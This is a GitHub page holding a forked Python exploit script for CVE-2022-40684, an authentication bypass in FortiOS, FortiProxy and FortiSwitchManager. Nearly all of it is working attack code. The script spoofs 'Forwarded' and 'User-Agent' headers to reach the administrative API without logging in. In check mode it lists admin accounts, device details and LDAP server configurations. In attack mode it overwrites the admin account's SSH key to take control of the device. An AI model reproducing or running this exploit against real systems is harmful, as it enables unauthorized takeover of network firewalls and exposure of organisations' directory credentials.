forked from mohamedbenchikh/CVE-2022-40684
-
Notifications
You must be signed in to change notification settings - Fork 0
/
CVE-2022-40684.py
131 lines (108 loc) · 4.18 KB
/
CVE-2022-40684.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
import argparse
import requests
import sys
import json
from colorama import Fore, Style, init
import warnings
init(convert=True)
warnings.filterwarnings('ignore')
artwork = '''
.,-:;//;:=,
. :H@@@MM@M#H/.,+%;,
,/X+ +M@@M@MM%=,-%HMMM@X/,
-+@MM; $M@@MH+-,;XMMMM@MMMM@+-
;@M@@M- XM@X;. -+XXXXXHHH@M@M#@/.
,%MM@@MH ,@%= .---=-=:=,.
=@#@@@MX., -%HX$$%%%:;
=-./@M@M$ .;@MMMM@MM:
X@/ -$MM/ Developed by: . +MM@@@M$
,@M@H: :@: Mohamed Benchikh . =X#@@@@-
,@@@MMX, . (@mohamedbenchikh) /H- ;@M@M=
.H@@@@M@+, %MM+..%#$.
/MMMM@MMH/. XM@MH; =;
/%+%$XHH@$= , .H@@@@MX,
.=--------. -%H.,@@@@@MX,
.%MM@@@HHHXX$$$%+- .:$MMX =M@@MM%.
=XMMM@MM@MM#H;,-+HMM@M+ /MMMX=
=%@M@M#@$-.=$@MM@@@M; %M%=
,:+$+-,/H#MMMMMMM@= =,
=++%%%%+/:-.
Authentication Bypass Exploit (CVE-2022-40684)
Affected Products: FortiOS, FortiProxy and FortiSwitchManager
Use at your own risk!
'''
headers = {
'User-Agent': 'Report Runner',
'Forwarded': 'for="[127.0.0.1]:8080";by="[127.0.0.1]:8081";'
}
def add_user(target, key_path):
key = open(key_path).read().strip()
data = {
"ssh-public-key1": f'"{key}"'
}
req = requests.put(f'https://{target}/api/v2/cmdb/system/admin/admin',
headers=headers, json=data, verify=False)
if 'SSH key is good' not in req.text:
print(f'[-] {target} is not vulnerable!')
else:
print(
f'[+] SSH key for {Fore.GREEN}admin{Style.RESET_ALL} was added successfully!')
def check(target):
print("Checking target: {}".format(target))
req = requests.get(f"https://{target}/api/v2/cmdb/system/admin",
headers=headers, verify=False)
if(req.status_code == 200):
print(Fore.RED + f"[+] {target} is vulnerable" + Style.RESET_ALL)
data = json.loads(req.text)
print(
f"[*] Found {Fore.GREEN + str(len(data['results'])) + Style.RESET_ALL} users")
if args.verbose:
for user in data['results']:
print(
f"[+] Username: {Fore.GREEN + user['name'] + Style.RESET_ALL}")
print(
f"[+] Role: {Fore.GREEN + user['accprofile'] + Style.RESET_ALL}")
print("[+] Serial: {}".format(data['serial']))
print("[+] Version: {}".format(data['version']))
req = requests.get(
f"https://{target}/api/v2/cmdb/user/ldap", headers=headers, verify=False)
data = json.loads(req.text)
print(f'Found {len(data["results"])} LDAP configs')
for (index, config) in enumerate(data['results']):
print(Fore.GREEN + "*"*20 +
f" LDAP Config #{index} " + "*"*20 + Style.RESET_ALL)
print(
"[+] LDAP Host: {}".format(config['name']))
print(
"[+] LDAP IP: {}".format(config['server']))
print(
"[+] LDAP Distinguished Name (DN): {}".format(config['dn']))
print(
"[+] LDAP Username: {}".format(config['username']))
else:
print("[-] The target is not vulnerable")
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument(
'-t', '--target', help='The IP address of the target')
parser.add_argument(
'-c', '--check', help='Check if the target is vulnerable', action='store_true')
parser.add_argument(
'-a', '--attack', help='Overwrite admin ssh key', action='store_true')
parser.add_argument(
'-v', '--verbose', help='Increase Verbosity', action='store_true')
parser.add_argument('-k', '--key-file',
help='The SSH key file', required=('--attack' in sys.argv or '-a' in sys.argv))
args = parser.parse_args()
if args.target:
args.target = args.target.rstrip('/').split('://')[-1]
else:
print(artwork)
parser.print_help()
exit()
if args.check:
check(args.target)
elif args.attack:
add_user(args.target, args.key_file)
else:
print("Please Specify attack or check mode")